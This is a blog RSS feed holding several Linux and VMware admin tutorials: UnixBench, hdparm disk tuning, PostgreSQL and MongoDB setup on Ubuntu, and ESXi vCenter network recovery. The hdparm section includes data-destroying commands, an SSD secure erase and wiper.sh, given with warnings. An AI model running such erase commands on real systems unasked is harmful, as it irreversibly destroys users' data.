Exploring and experimenting with Linux can be a rewarding and educational experience. However, it’s crucial to do so with knowledge and caution. The commands discussed here represent only a fraction of what is possible (and potentially dangerous) in the terminal. The golden rule is simple: if you’re not sure what a command does, research before executing it. Protecting your system is protecting your work, your memories, and ultimately, your peace of mind.

 

 

La entrada Commands you should not run in Linux se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/commands-you-should-not-run-in-linux/feed/ 0
Performance Testing in Linux with UnixBench https://aprendeit.com/en/performance-testing-in-linux-with-unixbench/ https://aprendeit.com/en/performance-testing-in-linux-with-unixbench/#respond Tue, 26 Dec 2023 06:44:38 +0000 https://aprendeit.com/?p=5981 For Linux enthusiasts, conducting performance tests is key to getting the most out of their systems. UnixBench is an essential tool in this process, offering a detailed analysis of the ...

La entrada Performance Testing in Linux with UnixBench se publicó primero en Aprende IT.

]]>
For Linux enthusiasts, conducting performance tests is key to getting the most out of their systems. UnixBench is an essential tool in this process, offering a detailed analysis of the performance of Linux and Unix systems.

What is UnixBench?

UnixBench is an open-source performance test suite designed for Unix and Linux systems. It is characterized by its ease of use and depth, allowing the performance of various system components to be measured.

Installation of UnixBench

The installation of UnixBench is simple and is carried out through a few commands in the terminal:
Clone the UnixBench repository:

git clone https://github.com/kdlucas/byte-unixbench.git

Access the UnixBench directory:

cd byte-unixbench/UnixBench

Compile and build UnixBench:

make

Running Your First Test with UnixBench

To launch your first test, follow these steps:
In the same UnixBench folder, execute:

./Run

This will start a series of tests that will evaluate different aspects of your system.

Analysis of Results

The results of UnixBench are presented in the form of scores and data, providing a clear idea of your system’s performance in areas such as CPU, memory, and disk operations.

Advanced Tests

UnixBench allows specific tests for different components. For example, to focus on the CPU:

./Run dhry2reg whetstone-double

Customizing Tests

UnixBench offers the flexibility to customize the tests. You can choose which tests to run and adapt them to your specific needs.

Real-Time Monitoring

While the tests are running, it is useful to perform real-time monitoring of the system using tools such as top or htop.

Network Performance Testing

In addition to the basic components, UnixBench can also evaluate your system’s network performance, a crucial aspect for servers or network-dependent environments.

Integration with Monitoring Tools

UnixBench can be integrated with advanced system monitoring tools, providing a detailed analysis of system performance during tests.

Tips for Optimizing Performance

After the tests, you can identify areas for improvement and start optimizing your system, adjusting configurations, updating hardware, or modifying the software environment.

La entrada Performance Testing in Linux with UnixBench se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/performance-testing-in-linux-with-unixbench/feed/ 0
The hdparm Utility: Tune Your Disk https://aprendeit.com/en/the-hdparm-utility-tune-your-disk/ https://aprendeit.com/en/the-hdparm-utility-tune-your-disk/#respond Tue, 05 Dec 2023 06:38:49 +0000 https://aprendeit.com/?p=5947 Do you want to get the most out of your hard drive or SSD? hdparm is your tool. Developed by Mark Lord in 2005, this Linux utility allows you to ...

La entrada The hdparm Utility: Tune Your Disk se publicó primero en Aprende IT.

]]>
Do you want to get the most out of your hard drive or SSD? hdparm is your tool. Developed by Mark Lord in 2005, this Linux utility allows you to diagnose and optimize your disk, control its speed, manage power saving, and even securely erase SSDs.

Installation and Basic Usage

Most Linux distributions already include hdparm. To start, open a terminal and run:

 hdparm -I /dev/sda | more

This command will show you all the available information about your disk, including the model and firmware version.

Measuring Disk Speed

To know the data transfer speed of your disk, use:

 hdparm -t /dev/sda

Repeat the measurement several times to get an average. If you want to measure the pure speed of the disk, without the effect of the system buffer, use hdparm -t --direct /dev/sda. You can also specify an offset with hdparm -t --direct --offset 500 /dev/sda to test different areas of the disk.

Optimizing Data Transmission

To improve data transmission, hdparm allows you to adjust the number of sectors read at once with the command:

hdparm -m16 /dev/sda

This command configures the simultaneous reading of 16 sectors. Additionally, you can activate the “read-ahead” function with hdparm -a256 /dev/sda, which causes the disk to preemptively read 256 sectors.

Controlling 32-Bit Mode and Disk Noise

With hdparm -c /dev/sda, you can check if your disk is operating in 32-bit mode, and force this mode with -c3. If your disk is noisy, you can reduce the noise by activating the “acoustic mode” with hdparm -M 128 /dev/sda, or maximize speed with `hdparm -M 254 /dev/sda​​​​.

Managing Write Cache

The command hdparm -W /dev/sda allows you to activate or deactivate the write cache, which can speed up data writing but at the risk of data loss in case of power cuts.

Setting Power Saving Mode

You can manage the disk’s power saving with hdparm -B255 /dev/sda to deactivate it, or use values between 1 and 254 for different levels of saving and performance. With hdparm -S 128 /dev/sda, you set the idle time before the disk enters sleep mode.

Cleaning SSDs

SSDs can accumulate residual data blocks. To clean them, use the script wiper.sh /dev/sda, but with caution, as it can lead to data loss.

Secure Erasure in SSDs

For securely erasing an SSD, hdparm offers the “secure erase” function with

hdparm --user-master u --security-erase 123456 /dev/sdb

This process completely removes data, but requires caution as it can render the SSD unusable in some cases.

Handling Old IDE Disks

For IDE disks, it is important to check and configure DMA with hdparm -d1 /dev/hda to improve data transfer. If you encounter problems, deactivate it with `hdparm -d0 /dev/hda​​.

Maintaining Changes After Restarting

To ensure that changes made with hdparm persist after restarting, you must add them to the system startup scripts or, in Debian-based systems, in the /etc/hdparm.conf file.
Remember that this is a powerful tool and should be used with knowledge. Always make backups before making significant changes and consult specific documentation.

La entrada The hdparm Utility: Tune Your Disk se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/the-hdparm-utility-tune-your-disk/feed/ 0
Introduction to PostgreSQL https://aprendeit.com/en/introduction-to-postgresql/ https://aprendeit.com/en/introduction-to-postgresql/#respond Mon, 20 Nov 2023 10:38:08 +0000 https://aprendeit.com/?p=5792 Welcome to this article where I will introduce you to the world of PostgreSQL. Have you ever heard of this database management system? If your answer is no, or if ...

La entrada Introduction to PostgreSQL se publicó primero en Aprende IT.

]]>
Welcome to this article where I will introduce you to the world of PostgreSQL. Have you ever heard of this database management system? If your answer is no, or if you simply want to deepen your knowledge, you’ve come to the right place. Here, I will explain what PostgreSQL is, how to install it on Ubuntu, and how to manage a PostgreSQL instance from the console in a basic way.

What is PostgreSQL?

PostgreSQL is an open-source relational database management system (RDBMS). It is known for its robustness, its ability to handle large volumes of data, and its compliance with SQL standards. The great thing about PostgreSQL is that it not only allows you to work with relational data, but also supports JSON queries, which gives you a lot of flexibility.
This system is widely used in all kinds of applications, from small mobile applications to large database management systems for high-traffic websites. Its active community and constant development make it a very attractive option for developers and system administrators.

Installing PostgreSQL on Ubuntu

Installing PostgreSQL on Ubuntu is a fairly straightforward process. Ubuntu has PostgreSQL in its default repositories, making installation as easy as running a few commands in the terminal.
To start, open a terminal on your Ubuntu system and follow these steps:

  1. First, update your system’s package index with the command sudo apt update.
  2. Then, install the PostgreSQL package using sudo apt install postgresql postgresql-contrib. This command will install PostgreSQL along with some additional modules that are useful.

Once the installation is complete, the PostgreSQL service will automatically start on your system. To verify that PostgreSQL is running, you can use the command sudo systemctl status postgresql.

Basic Management of PostgreSQL from the Console

Now that you have PostgreSQL installed, it’s time to learn some basic commands to manage your database from the console.

Accessing PostgreSQL

PostgreSQL creates a default user named postgres. To start using PostgreSQL, you will need to switch to this user. You can do this with the command sudo -i -u postgres. Once this is done, you can access the PostgreSQL console with the command psql.

Creating a Database and a User

Creating a database and a user is fundamental to getting started. To create a new database, use the command CREATE DATABASE your_database_name;.
To create a new user, use the command CREATE USER your_user WITH PASSWORD 'your_password';. It’s important to choose a secure password.

Assigning Privileges

After creating your database and user, you’ll want to assign the necessary privileges to the user. This is done with the command GRANT ALL PRIVILEGES ON DATABASE your_database_name TO your_user;.

Basic Operations

With your database and user set up, you can begin to perform basic operations. Some of the most common include:

  • INSERT: To insert data into your tables.
  • SELECT: To read data.
  • UPDATE: To update existing data.
  • DELETE: To delete data.

These commands form the basis of the SQL language and will allow you to interact with your data effectively.

Managing Security in PostgreSQL

Security is crucial when it comes to databases. PostgreSQL offers several features to secure your data. One of them is connection encryption, which you can set up to secure communication between your application and the database.
It’s also important to regularly review and update your passwords, and to carefully manage user permissions to ensure that they only have access to what they need.

Maintenance and Performance

Maintaining your PostgreSQL database in good condition is vital to ensuring optimal performance. PostgreSQL comes with some tools that will help you in this task, like the VACUUM command, which helps clean up the database and recover space.
Additionally, it’s advisable to perform regular backups. You can use the pg_dump command to backup your database.

Tips and Best Practices

To conclude, here are some tips and best practices that will help you get the most out of PostgreSQL:

  • Stay up-to-date with PostgreSQL updates to take advantage of improvements and security fixes.
  • Learn about indexes and how they can improve the performance of your queries.
  • Familiarize yourself with PostgreSQL’s monitoring tools to keep an eye on the performance and health of your database.

I hope this article has provided you with a good foundation on PostgreSQL. Although we have not reached a formal conclusion, I hope this content is the start of your journey in the world of databases with PostgreSQL. Good luck!

La entrada Introduction to PostgreSQL se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/introduction-to-postgresql/feed/ 0
How to Get Started with MongoDB: Your Ultimate Guide https://aprendeit.com/en/how-to-get-started-with-mongodb-your-ultimate-guide/ https://aprendeit.com/en/how-to-get-started-with-mongodb-your-ultimate-guide/#respond Sat, 11 Nov 2023 14:02:55 +0000 https://aprendeit.com/?p=5729 MongoDB is one of those terms that, if you are involved in software development or database management, you’ve surely heard over and over again. And not without reason, as its ...

La entrada How to Get Started with MongoDB: Your Ultimate Guide se publicó primero en Aprende IT.

]]>
MongoDB is one of those terms that, if you are involved in software development or database management, you’ve surely heard over and over again. And not without reason, as its flexibility and power have revolutionized the way we store and retrieve data in the modern era. In this article, I’m going to walk you through what MongoDB is, how it differs from traditional SQL databases, how you can install it on Ubuntu and manage it from the console, and, of course, why setting up a cluster can be a great advantage for your projects.

What is MongoDB?

MongoDB is an open-source, document-oriented NoSQL database system that has gained popularity due to its ability to handle large volumes of data efficiently. Instead of tables, as in relational databases, MongoDB uses collections and documents. A document is a set of key-value pairs, which in the world of MongoDB is represented in a format called BSON (a binary version of JSON). This structure makes it very flexible and easy to scale, making it particularly suitable for modern web applications and handling data in JSON format, which is common in the development of web and mobile applications.

The Difference Between SQL and NoSQL

To better understand MongoDB, it is crucial to differentiate between SQL and NoSQL databases. SQL databases (such as MySQL, PostgreSQL, or Microsoft SQL Server) use a structured query language (SQL) and are based on a predefined data schema. This means that you must know in advance how your data will be structured and adhere to that structure, which offers a high degree of consistency and ACID transactions (Atomicity, Consistency, Isolation, and Durability).
On the other hand, NoSQL databases like MongoDB are schematically dynamic, allowing you to save documents without having to define their structure beforehand. They are ideal for unstructured or semi-structured data and offer horizontal scalability, which means you can easily add more servers to handle more load.

Installing MongoDB on Ubuntu

Getting MongoDB up and running on your Ubuntu system is a fairly straightforward process, but it requires following some steps carefully. Here’s how to do it:

System Update

Before installing any new package, it is always good practice to update the list of packages and the software versions of your operating system with the following commands:

sudo apt update
sudo apt upgrade

Installing the MongoDB Package

Ubuntu has MongoDB in its default repositories, but to ensure you get the latest version, it is advisable to use the official MongoDB repository. Here’s how to set it up and carry out the installation:

sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv E52529D4
echo "deb [ arch=amd64,arm64 ] http://repo.mongodb.org/apt/ubuntu $(lsb_release -cs)/mongodb-org/4.4 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-4.4.list
sudo apt update
sudo apt install -y mongodb-org

Getting MongoDB Up and Running

Once installed, you can start the MongoDB server with the following command:

sudo systemctl start mongod

If you also want MongoDB to start automatically with the system, execute:

sudo systemctl enable mongod

Installation Verification

To verify that MongoDB is installed and running correctly, use:

sudo systemctl status mongod

Or you can try to connect to the MongoDB server using its shell:

mongo

Basic MongoDB Management from the Console

Now that you have MongoDB running on your Ubuntu machine, it’s time to learn some basic commands to manage your MongoDB instance from the console.

Creating and Using a Database

To create a new database, simply use the use command followed by the name of your database:

use myDatabase

If the database does not exist, MongoDB will create it when you save your first document.

Inserting Data

To insert data into a collection, you can use the insert command. For example:

db.myCollection.insert({ name: "Alice", age: 25 })

This will add a new document to the collection myCollection.

Reading Data

You can read or search for documents in a collection with the find command. For example:

db.myCollection.find({ name: "Alice" })

This will search for all documents where the name is “Alice”.

Updating Data

To update documents, you would use update. For example:

db.myCollection.update({ name: "Alice" }, { $set: { age: 26 } })

This will update Alice’s age to 26.

Deleting Data

And to delete documents, you simply use remove:

db.myCollection.remove({ name: "Alice" })

This will remove all documents where the name is “Alice”.

The Power of MongoDB Clusters

While managing a single instance of MongoDB may be sufficient for many projects, especially during development and testing phases, when it comes to production applications with large volumes of data or high availability requirements, setting up a MongoDB cluster can be essential. A cluster can distribute data across multiple servers, which not only provides redundancy and high availability but also improves the performance of read and write operations.
MongoDB clusters use the concept of sharding to distribute data horizontally and replicas to ensure that data is always available, even if part of the system fails. In another article, we will explore how to set up your own MongoDB cluster, but for now, it’s enough to know that this is a powerful feature that MongoDB offers to scale your application as it grows.

As you delve into the world of MongoDB, you’ll find that there is much more to learn and explore. From its integration with different programming languages to the complexities of indexing and query performance, MongoDB offers a world of possibilities that can suit almost any modern application need.

Remember that mastering MongoDB takes time and practice, but starting with the basics will put you on the right track. Experiment with commands, try different configurations, and don’t be afraid to break things in a test environment; it’s the best way to learn. The flexibility and power of MongoDB await, and with the foundation you’ve built today, you are more than ready to start exploring. Let’s get to work!

La entrada How to Get Started with MongoDB: Your Ultimate Guide se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/how-to-get-started-with-mongodb-your-ultimate-guide/feed/ 0
Start vCenter with Connectivity from ESX when DVS is Not Working https://aprendeit.com/en/start-vcenter-with-connectivity-from-esx-when-dvs-is-not-working/ https://aprendeit.com/en/start-vcenter-with-connectivity-from-esx-when-dvs-is-not-working/#respond Tue, 31 Oct 2023 07:02:07 +0000 https://aprendeit.com/?p=5678 When working with virtual environments like VMware, one of the crucial components for management is vCenter, which acts as the brain of the virtual data center. Everything works wonderfully until, ...

La entrada Start vCenter with Connectivity from ESX when DVS is Not Working se publicó primero en Aprende IT.

]]>
When working with virtual environments like VMware, one of the crucial components for management is vCenter, which acts as the brain of the virtual data center. Everything works wonderfully until, for some reason, we lose network connectivity in vCenter, and this is where things can get really complicated, especially if you are using Distributed Virtual Switches (DVS). In this article, I will guide you step by step on how to recover your vCenter and bring it back to life, even when all seems lost.

What Happens When vCenter Loses Network Connectivity?

The symptoms of this problem are quite clear:

  • The management network only exists on a DVS.
  • There are no ephemeral ports configured on the cluster.
  • vCenter loses network connectivity after an unplanned or planned outage.
  • You cannot reconnect vCenter to a DVS port group on the same hosts or on different ones.
  • You cannot open the vSphere client of vCenter to make changes to the network because the network connection of vCenter is down.

When you try to modify the network configuration on any ESXi host, or if you want to change the network adapters for an ESXi host connected to a DVS with non-ephemeral ports, you will encounter the following error:
“Adding or reconfiguring network adapters connected to non-ephemeral virtual distributed port groups is not supported.”

Causes of the Problem

If vCenter is connected to a Distributed Switch and loses access to the network, vCenter will not be able to connect to a distributed port because it does not have access to the ESXi hosts.
VMware recommends configuring ephemeral ports for the management network in your environment to prevent this problem from occurring again.

Impact and Risks

You should have at least 2 vmnics used for the management network because in one of the steps we will remove a vmnic from the DVS management port group to be able to use it for the temporary Standard Switch.
WARNING: If the vmnics are in an LACP configuration, you will need to break it on the physical switch to avoid downtime. Follow this KB for steps on how to work with an LACP configuration.

If you do not have 2 vmnics on the ESXi host, it is recommended that you follow these steps through the DCUI Shell. Otherwise, you will lose access to SSH when you run the vmnic removal command and will not be able to continue with the process.

Step by Step Solution

Step 1: Remove a vmnic located in the DVS connected to the Management Network
Identify the port ID where the vmnic you want to remove is connected to the DVS:

# esxcli network vswitch dvs vmware list | egrep "Client: vmnic#" -A3

The output will be similar to:

# esxcli network vswitch dvs vmware list | egrep "Client: vmnic1" -A3
Client: vmnic1
DVPortgroup ID: dvportgroup-5008
In Use: true
Port ID: 12

Remove the vmnic:

# esxcfg-vswitch -Q vmnic# -V PortID DVSName

Example using vmnic1, Port ID 12, and DVS Name ProdSwitchDVS:

# esxcfg-vswitch -Q vmnic1 -V 12 ProdSwitchDVS

Step 2: Create a Standard Switch, a Portgroup, and Add the vmnic to the Standard Switch

Create a Standard switch:

# esxcli network vswitch standard add --vswitch-name=vSwitchName

Create a Portgroup:

# esxcli network vswitch standard portgroup add --portgroup-name=PortgroupName --vswitch-name=vSwitchName

Add a vmnic to the Standard Switch:

# esxcli network vswitch standard uplink add --uplink-name=vmnic --vswitch-name=vSwitchName

Step 3: Recover Network Connectivity of the vCenter Virtual Machine

First, we will connect the vCenter virtual machine to the newly created Portgroup of the Standard Switch. This will help to recover access to vCenter’s network, allowing the ESXi hosts to reconnect to the vCenter server, and you will be able to manage your infrastructure again.

  • Log in to the ESXi vSphere client with administrator credentials.
  • Go to “Virtual Machines”.
  • Select the vCenter virtual machine.
  • Click “Actions” > “Edit Settings”.
  • Connect Network Adapter 1 to the newly created Portgroup of the Standard Switch.
  • Click Save.

At this point, you should have recovered the network connectivity of vCenter and you should now be able to connect to its vSphere client. If you still can’t, make sure that the Portgroup of the Standard Switch has the correct VLAN and MTU configuration.
Once you have verified that everything is fine in your vCenter inventory, migrate vCenter back to the DVS to have the same configuration as before the outage.

Step 4: Migrate the vmnic Back to the DVS

Now, let’s return the vmnic to the DVS by following these steps:

  • If you have not logged in to the vCenter vSphere client, log in with administrator credentials.
    Go to the “Networking” tab.
  • Right-click on the DVS and select “Add and Manage Hosts”.
  • Select “Manage the host networking” and click Next.
  • Click on “Attached hosts…”.
  • Select the ESXi host with the vmk and vmnic that you want to add back to the DVS and click OK.
  • Click Next.
  • In the “Management Networks” list, select the vmk and click “Assign” to assign it to the desired management port group. Click Next.
  • In the “Physical Adapters” list, select the vmnic and click “Assign” to assign it to the DVS. Click Next.
  • Click Next and then Finish.

Step 5: Migrate vCenter Back to the DVS

  • Go to “Virtual Machines”.
  • Select the vCenter virtual machine.
  • Click “Actions” > “Edit Settings”.
  • Change Network Adapter 1 back to the original DVS port group.
  • Click Save.

Step 6: Remove the Temporary Standard Switch and Portgroup

Remove the Portgroup from the Standard Switch:

esxcli network vswitch standard portgroup remove --portgroup-name=PortgroupName --vswitch-name=vSwitchName

Remove the vmnic from the Standard Switch:

esxcli network vswitch standard uplink remove --uplink-name=vmnic --vswitch-name=vSwitchName

Remove the Standard Switch:

esxcli network vswitch standard remove --vswitch-name=vSwitchName

Conclusion

This process, though quite complex and meticulous, can save the day when vCenter is down due to a network issue. Ensuring that you have a proper backup and understanding the VMware infrastructure and its dependencies is key to successful recovery. It’s highly recommended to have a plan for such scenarios and ensure that the team managing the infrastructure is familiar with these procedures to ensure a quick and smooth recovery when required.

La entrada Start vCenter with Connectivity from ESX when DVS is Not Working se publicó primero en Aprende IT.

]]>
https://aprendeit.com/en/start-vcenter-with-connectivity-from-esx-when-dvs-is-not-working/feed/ 0